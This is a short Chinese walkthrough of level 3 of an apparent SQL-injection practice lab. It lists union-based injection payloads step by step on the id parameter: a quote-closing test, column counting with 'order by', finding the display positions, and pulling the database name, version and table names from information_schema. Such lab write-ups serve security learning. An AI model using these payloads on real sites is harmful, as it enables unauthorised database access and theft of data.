今天来搞搞第三关,感觉和之前差不多,就多了一个奇怪的知识
data:image/s3,"s3://crabby-images/51c87/51c8708f1767291a77fd078ac606d5efc739b422" alt=""
来看看有没有注入点
/?id=1'
data:image/s3,"s3://crabby-images/1feb5/1feb51349cda4c66bcd3086973e5c0378e5d1275" alt=""
有注入点
判断注入点类型
输入/?id=1') and 1=2 --+
data:image/s3,"s3://crabby-images/b7912/b79121351479739bc5d7092e9f4dda2fbb37493e" alt=""
3.判断它的字段数
/?id=1') order by 1-++
/?id=1') order by 2-++
/?id=1') order by 3-++
/?id=1') order by 4-++
data:image/s3,"s3://crabby-images/d86fa/d86fa7034ea1779b89622055bdf9c724459bc296" alt=""
爆出显示位
/?id=-1') union select 1,2,3 --+
data:image/s3,"s3://crabby-images/42182/42182d7becbf1673aac517589373b54b2bd9e7cb" alt=""
开始判断库名
?id=-1') union select 1,database(),version() --+
data:image/s3,"s3://crabby-images/c3051/c3051e678a60b3e20dd07cf0bc60ffaf87ccfde6" alt=""
判断表名
/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
data:image/s3,"s3://crabby-images/59538/59538fe5b47c248b6743b3bad443f89ffbcbf4d0" alt=""
判断user的列名
data:image/s3,"s3://crabby-images/69ba3/69ba38433827a7257a3f72c9ebd1d89f0d58874b" alt=""
爆具体的列里的数据
data:image/s3,"s3://crabby-images/8daab/8daabd05fd49455e182d4382358f6f1c048266f5" alt=""